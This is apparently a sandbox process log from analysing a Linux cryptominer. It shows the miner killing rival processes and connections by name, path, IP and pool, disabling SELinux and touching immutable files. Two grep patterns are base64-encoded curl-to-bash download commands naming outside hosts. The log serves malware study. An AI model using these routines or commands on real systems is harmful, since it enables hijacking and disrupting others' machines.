- /bin/grep
  grep -v grep
  2⤵
  PID:2120
- /bin/ps
  ps aux
  2⤵
  PID:2119
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2128
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2127
- /bin/grep
  grep rsync
  2⤵
  PID:2126
- /bin/grep
  grep -v grep
  2⤵
  PID:2125
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2124
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2133
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2132
- /bin/grep
  grep watchd0g
  2⤵
  PID:2131
- /bin/grep
  grep -v grep
  2⤵
  PID:2130
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2129
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2138
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2137
- /bin/egrep
  egrep "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2136
- /usr/local/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2136
- /usr/local/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2136
- /usr/sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2136
- /usr/bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2136
- /sbin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2136
- /bin/grep
  grep -E "wnTKYg|2t3ik|qW3xT.2|ddg"
  2⤵
  PID:2136
- /bin/grep
  grep -v grep
  2⤵
  PID:2135
- /bin/ps
  ps aux
  2⤵
  PID:2134
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2143
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2142
- /bin/grep
  grep 158.69.133.18:8220
  2⤵
  - Disables SELinux
  PID:2141
- /bin/grep
  grep -v grep
  2⤵
  PID:2140
- /bin/ps
  ps aux
  2⤵
  PID:2139
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2148
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2147
- /bin/grep
  grep /tmp/java
  2⤵
  PID:2146
- /bin/grep
  grep -v grep
  2⤵
  PID:2145
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2144
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2153
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2152
- /bin/grep
  grep gitee.com
  2⤵
  PID:2151
- /bin/grep
  grep -v grep
  2⤵
  PID:2150
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2149
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2158
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2157
- /bin/grep
  grep /tmp/java
  2⤵
  PID:2156
- /bin/grep
  grep -v grep
  2⤵
  PID:2155
- /bin/ps
  ps aux
  2⤵
  PID:2154
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2163
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2162
- /bin/grep
  grep 104.248.4.162
  2⤵
  PID:2161
- /bin/grep
  grep -v grep
  2⤵
  PID:2160
- /bin/ps
  ps aux
  2⤵
  PID:2159
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2168
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2167
- /bin/grep
  grep 89.35.39.78
  2⤵
  PID:2166
- /bin/grep
  grep -v grep
  2⤵
  PID:2165
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2164
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2173
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2172
- /bin/grep
  grep /dev/shm/z3.sh
  2⤵
  PID:2171
- /bin/grep
  grep -v grep
  2⤵
  PID:2170
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2169
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2178
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2177
- /bin/grep
  grep kthrotlds
  2⤵
  PID:2176
- /bin/grep
  grep -v grep
  2⤵
  PID:2175
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2174
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2183
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2182
- /bin/grep
  grep ksoftirqds
  2⤵
  PID:2181
- /bin/grep
  grep -v grep
  2⤵
  PID:2180
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2179
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2188
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2187
- /bin/grep
  grep netdns
  2⤵
  PID:2186
- /bin/grep
  grep -v grep
  2⤵
  PID:2185
- /bin/ps
  ps aux
  2⤵
  PID:2184
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2193
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2192
- /bin/grep
  grep watchdogs
  2⤵
  PID:2191
- /bin/grep
  grep -v grep
  2⤵
  PID:2190
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2189
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2198
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2197
- /bin/grep
  grep kdevtmpfsi
  2⤵
  PID:2196
- /bin/grep
  grep -v grep
  2⤵
  PID:2195
- /bin/ps
  ps aux
  2⤵
  PID:2194
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2203
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2202
- /bin/grep
  grep kinsing
  2⤵
  PID:2201
- /bin/grep
  grep -v grep
  2⤵
  PID:2200
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2199
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2208
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2207
- /bin/grep
  grep redis2
  2⤵
  PID:2206
- /bin/grep
  grep -v grep
  2⤵
  PID:2205
- /bin/ps
  ps aux
  2⤵
  PID:2204
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2214
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2213
- /bin/grep
  grep " ps"
  2⤵
  PID:2212
- /bin/grep
  grep -v aux
  2⤵
  PID:2211
- /bin/grep
  grep -v grep
  2⤵
  PID:2210
- /bin/ps
  ps aux
  2⤵
  PID:2209
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2219
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:2218
- /bin/grep
  grep sync_supers
  2⤵
  PID:2217
- /bin/grep
  grep -v grep
  2⤵
  PID:2216
- /bin/ps
  ps aux
  2⤵
  PID:2215
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2224
- /usr/bin/cut
  cut -c 9-15
  2⤵
  PID:2223
- /bin/grep
  grep cpuset
  2⤵
  PID:2222
- /bin/grep
  grep -v grep
  2⤵
  PID:2221
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2220
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2230
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2229
- /bin/grep
  grep "x]"
  2⤵
  PID:2228
- /bin/grep
  grep -v aux
  2⤵
  PID:2227
- /bin/grep
  grep -v grep
  2⤵
  PID:2226
- /bin/ps
  ps aux
  2⤵
  PID:2225
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2236
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2235
- /bin/grep
  grep "sh] <"
  2⤵
  PID:2234
- /bin/grep
  grep -v aux
  2⤵
  PID:2233
- /bin/grep
  grep -v grep
  2⤵
  PID:2232
- /bin/ps
  ps aux
  2⤵
  PID:2231
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2242
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2241
- /bin/grep
  grep " \\[]"
  2⤵
  PID:2240
- /bin/grep
  grep -v aux
  2⤵
  PID:2239
- /bin/grep
  grep -v grep
  2⤵
  PID:2238
- /bin/ps
  ps aux
  2⤵
  PID:2237
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2247
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2246
- /bin/grep
  grep /tmp/l.sh
  2⤵
  PID:2245
- /bin/grep
  grep -v grep
  2⤵
  PID:2244
- /bin/ps
  ps aux
  2⤵
  PID:2243
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2252
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2251
- /bin/grep
  grep /tmp/zmcat
  2⤵
  PID:2250
- /bin/grep
  grep -v grep
  2⤵
  PID:2249
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2248
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2257
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2256
- /bin/grep
  grep hahwNEdB
  2⤵
  PID:2255
- /bin/grep
  grep -v grep
  2⤵
  PID:2254
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2253
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2262
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2261
- /bin/grep
  grep CnzFVPLF
  2⤵
  PID:2260
- /bin/grep
  grep -v grep
  2⤵
  PID:2259
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2258
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2267
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2266
- /bin/grep
  grep CvKzzZLs
  2⤵
  PID:2265
- /bin/grep
  grep -v grep
  2⤵
  PID:2264
- /bin/ps
  ps aux
  2⤵
  PID:2263
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2272
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2271
- /bin/grep
  grep aziplcr72qjhzvin
  2⤵
  PID:2270
- /bin/grep
  grep -v grep
  2⤵
  PID:2269
- /bin/ps
  ps aux
  2⤵
  PID:2268
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2277
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2276
- /bin/grep
  grep /tmp/udevd
  2⤵
  PID:2275
- /bin/grep
  grep -v grep
  2⤵
  PID:2274
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2273
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2282
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2281
- /bin/grep
  grep KCBjdXJsIC1vIC0gaHR0cDovLzg5LjIyMS41Mi4xMjIvcy5zaCApIHwgYmFzaCA
  2⤵
  PID:2280
- /bin/grep
  grep -v grep
  2⤵
  PID:2279
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2278
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2287
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2286
- /bin/grep
  grep Y3VybCAtcyBodHRwOi8vMTA3LjE3NC40Ny4xNTYvbXIuc2ggfCBiYXNoIC1zaAo
  2⤵
  PID:2285
- /bin/grep
  grep -v grep
  2⤵
  PID:2284
- /bin/ps
  ps aux
  2⤵
  PID:2283
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2292
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2291
- /bin/grep
  grep sustse
  2⤵
  PID:2290
- /bin/grep
  grep -v grep
  2⤵
  PID:2289
- /bin/ps
  ps aux
  2⤵
  PID:2288
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2297
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2296
- /bin/grep
  grep sustse3
  2⤵
  PID:2295
- /bin/grep
  grep -v grep
  2⤵
  PID:2294
- /bin/ps
  ps aux
  2⤵
  PID:2293
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2303
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2302
- /bin/grep
  grep wget
  2⤵
  PID:2301
- /bin/grep
  grep mr.sh
  2⤵
  PID:2300
- /bin/grep
  grep -v grep
  2⤵
  PID:2299
- /bin/ps
  ps aux
  2⤵
  PID:2298
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2309
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2308
- /bin/grep
  grep curl
  2⤵
  PID:2307
- /bin/grep
  grep mr.sh
  2⤵
  PID:2306
- /bin/grep
  grep -v grep
  2⤵
  PID:2305
- /bin/ps
  ps aux
  2⤵
  PID:2304
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2315
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2314
- /bin/grep
  grep wget
  2⤵
  PID:2313
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:2312
- /bin/grep
  grep -v grep
  2⤵
  PID:2311
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2310
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2321
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2320
- /bin/grep
  grep curl
  2⤵
  PID:2319
- /bin/grep
  grep 2mr.sh
  2⤵
  PID:2318
- /bin/grep
  grep -v grep
  2⤵
  PID:2317
- /bin/ps
  ps aux
  2⤵
  PID:2316
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2327
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2326
- /bin/grep
  grep wget
  2⤵
  PID:2325
- /bin/grep
  grep cr5.sh
  2⤵
  PID:2324
- /bin/grep
  grep -v grep
  2⤵
  PID:2323
- /bin/ps
  ps aux
  2⤵
  PID:2322
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2333
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2332
- /bin/grep
  grep curl
  2⤵
  PID:2331
- /bin/grep
  grep cr5.sh
  2⤵
  PID:2330
- /bin/grep
  grep -v grep
  2⤵
  PID:2329
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2328
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2339
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2338
- /bin/grep
  grep wget
  2⤵
  PID:2337
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:2336
- /bin/grep
  grep -v grep
  2⤵
  PID:2335
- /bin/ps
  ps aux
  2⤵
  PID:2334
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2345
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2344
- /bin/grep
  grep curl
  2⤵
  PID:2343
- /bin/grep
  grep logo9.jpg
  2⤵
  PID:2342
- /bin/grep
  grep -v grep
  2⤵
  PID:2341
- /bin/ps
  ps aux
  2⤵
  PID:2340
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2350
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2349
- /bin/grep
  grep j2.conf
  2⤵
  PID:2348
- /bin/grep
  grep -v grep
  2⤵
  PID:2347
- /bin/ps
  ps aux
  2⤵
  PID:2346
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2356
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2355
- /bin/grep
  grep wget
  2⤵
  PID:2354
- /bin/grep
  grep luk-cpu
  2⤵
  PID:2353
- /bin/grep
  grep -v grep
  2⤵
  PID:2352
- /bin/ps
  ps aux
  2⤵
  PID:2351
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2362
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2361
- /bin/grep
  grep curl
  2⤵
  PID:2360
- /bin/grep
  grep luk-cpu
  2⤵
  PID:2359
- /bin/grep
  grep -v grep
  2⤵
  PID:2358
- /bin/ps
  ps aux
  2⤵
  PID:2357
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2368
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2367
- /bin/grep
  grep wget
  2⤵
  PID:2366
- /bin/grep
  grep ficov
  2⤵
  PID:2365
- /bin/grep
  grep -v grep
  2⤵
  PID:2364
- /bin/ps
  ps aux
  2⤵
  PID:2363
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2374
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2373
- /bin/grep
  grep curl
  2⤵
  PID:2372
- /bin/grep
  grep ficov
  2⤵
  PID:2371
- /bin/grep
  grep -v grep
  2⤵
  PID:2370
- /bin/ps
  ps aux
  2⤵
  PID:2369
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2380
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2379
- /bin/grep
  grep wget
  2⤵
  PID:2378
- /bin/grep
  grep he.sh
  2⤵
  PID:2377
- /bin/grep
  grep -v grep
  2⤵
  PID:2376
- /bin/ps
  ps aux
  2⤵
  PID:2375
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2386
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2385
- /bin/grep
  grep curl
  2⤵
  PID:2384
- /bin/grep
  grep he.sh
  2⤵
  PID:2383
- /bin/grep
  grep -v grep
  2⤵
  PID:2382
- /bin/ps
  ps aux
  2⤵
  PID:2381
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2392
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2391
- /bin/grep
  grep wget
  2⤵
  PID:2390
- /bin/grep
  grep miner.sh
  2⤵
  PID:2389
- /bin/grep
  grep -v grep
  2⤵
  PID:2388
- /bin/ps
  ps aux
  2⤵
  PID:2387
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2398
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2397
- /bin/grep
  grep curl
  2⤵
  PID:2396
- /bin/grep
  grep miner.sh
  2⤵
  PID:2395
- /bin/grep
  grep -v grep
  2⤵
  PID:2394
- /bin/ps
  ps aux
  2⤵
  PID:2393
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2404
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2403
- /bin/grep
  grep wget
  2⤵
  PID:2402
- /bin/grep
  grep nullcrew
  2⤵
  PID:2401
- /bin/grep
  grep -v grep
  2⤵
  PID:2400
- /bin/ps
  ps aux
  2⤵
  PID:2399
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2410
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2409
- /bin/grep
  grep curl
  2⤵
  PID:2408
- /bin/grep
  grep nullcrew
  2⤵
  PID:2407
- /bin/grep
  grep -v grep
  2⤵
  PID:2406
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:2405
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2415
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2414
- /bin/grep
  grep 107.174.47.156
  2⤵
  PID:2413
- /bin/grep
  grep -v grep
  2⤵
  PID:2412
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2411
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2420
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2419
- /bin/grep
  grep 83.220.169.247
  2⤵
  PID:2418
- /bin/grep
  grep -v grep
  2⤵
  PID:2417
- /bin/ps
  ps aux
  2⤵
  PID:2416
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2425
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2424
- /bin/grep
  grep 51.38.203.146
  2⤵
  PID:2423
- /bin/grep
  grep -v grep
  2⤵
  PID:2422
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2421
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2430
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2429
- /bin/grep
  grep 144.217.45.45
  2⤵
  PID:2428
- /bin/grep
  grep -v grep
  2⤵
  PID:2427
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:2426
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2435
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2434
- /bin/grep
  grep 107.174.47.181
  2⤵
  PID:2433
- /bin/grep
  grep -v grep
  2⤵
  PID:2432
- /bin/ps
  ps aux
  2⤵
  PID:2431
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2440
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2439
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:2438
- /bin/grep
  grep -v grep
  2⤵
  PID:2437
- /bin/ps
  ps aux
  2⤵
  PID:2436
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2445
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2444
- /bin/grep
  grep mine.moneropool.com
  2⤵
  PID:2443
- /bin/grep
  grep -v grep
  2⤵
  PID:2442
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2441
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2450
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2449
- /bin/grep
  grep pool.t00ls.ru
  2⤵
  PID:2448
- /bin/grep
  grep -v grep
  2⤵
  PID:2447
- /bin/ps
  ps auxf
  2⤵
  PID:2446
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2455
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2454
- /bin/grep
  grep xmr.crypto-pool.fr:8080
  2⤵
  - Disables SELinux
  PID:2453
- /bin/grep
  grep -v grep
  2⤵
  PID:2452
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:2451
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2460
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2459
- /bin/grep
  grep xmr.crypto-pool.fr:3333
  2⤵
  PID:2458
- /bin/grep
  grep -v grep
  2⤵
  PID:2457
- /bin/ps
  ps auxf
  2⤵
  PID:2456
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2465
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2464
- /bin/grep
  grep "[email protected]"
  2⤵
  PID:2463
- /bin/grep
  grep -v grep
  2⤵
  PID:2462
- /bin/ps
  ps auxf
  2⤵
  PID:2461
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2470
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2469
- /bin/grep
  grep monerohash.com
  2⤵
  PID:2468
- /bin/grep
  grep -v grep
  2⤵
  PID:2467
- /bin/ps
  ps auxf
  2⤵
  PID:2466
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2475
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2474
- /bin/grep
  grep /tmp/a7b104c270
  2⤵
  - Disables SELinux
  PID:2473
- /bin/grep
  grep -v grep
  2⤵
  PID:2472
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2471
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2480
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2479
- /bin/grep
  grep xmr.crypto-pool.fr:6666
  2⤵
  PID:2478
- /bin/grep
  grep -v grep
  2⤵
  PID:2477
- /bin/ps
  ps auxf
  2⤵
  PID:2476
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2485
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2484
- /bin/grep
  grep xmr.crypto-pool.fr:7777
  2⤵
  PID:2483
- /bin/grep
  grep -v grep
  2⤵
  PID:2482
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:2481
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2490
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2489
- /bin/grep
  grep xmr.crypto-pool.fr:443
  2⤵
  PID:2488
- /bin/grep
  grep -v grep
  2⤵
  PID:2487
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2486
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2495
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2494
- /bin/grep
  grep stratum.f2pool.com:8888
  2⤵
  PID:2493
- /bin/grep
  grep -v grep
  2⤵
  PID:2492
- /bin/ps
  ps auxf
  2⤵
  PID:2491
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2500
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2499
- /bin/grep
  grep xmrpool.eu
  2⤵
  PID:2498
- /bin/grep
  grep -v grep
  2⤵
  PID:2497
- /bin/ps
  ps auxf
  2⤵
  PID:2496
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2505
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2504
- /bin/grep
  grep kieuanilam.me
  2⤵
  PID:2503
- /bin/grep
  grep -v grep
  2⤵
  PID:2502
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:2501
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2509
- - /usr/local/sbin/kill
    kill -9 2507
    3⤵
    PID:2510
- - /usr/local/bin/kill
    kill -9 2507
    3⤵
    PID:2510
- - /usr/sbin/kill
    kill -9 2507
    3⤵
    PID:2510
- - /usr/bin/kill
    kill -9 2507
    3⤵
    PID:2510
- - /sbin/kill
    kill -9 2507
    3⤵
    PID:2510
- - /bin/kill
    kill -9 2507
    3⤵
    PID:2510
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2508
- /bin/grep
  grep xiaoyao
  2⤵
  PID:2507
- /bin/ps
  ps auxf
  2⤵
  PID:2506
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2514
- - /usr/local/sbin/kill
    kill -9 2512
    3⤵
    PID:2515
- - /usr/local/bin/kill
    kill -9 2512
    3⤵
    PID:2515
- - /usr/sbin/kill
    kill -9 2512
    3⤵
    PID:2515
- - /usr/bin/kill
    kill -9 2512
    3⤵
    PID:2515
- - /sbin/kill
    kill -9 2512
    3⤵
    PID:2515
- - /bin/kill
    kill -9 2512
    3⤵
    - Reads CPU attributes
    PID:2515
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:2513
- /bin/grep
  grep xiaoxue
  2⤵
  PID:2512
- /bin/ps
  ps auxf
  2⤵
  PID:2511
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2521
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:2520
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:2519
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:2518
- /bin/grep
  grep 46.243.253.15
  2⤵
  PID:2517
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2527
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:2526
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:2525
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:2524
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:2523
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2529
- /usr/bin/pgrep
  pgrep -f L2Jpbi9iYXN
  2⤵
  PID:2528
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2531
- /usr/bin/pgrep
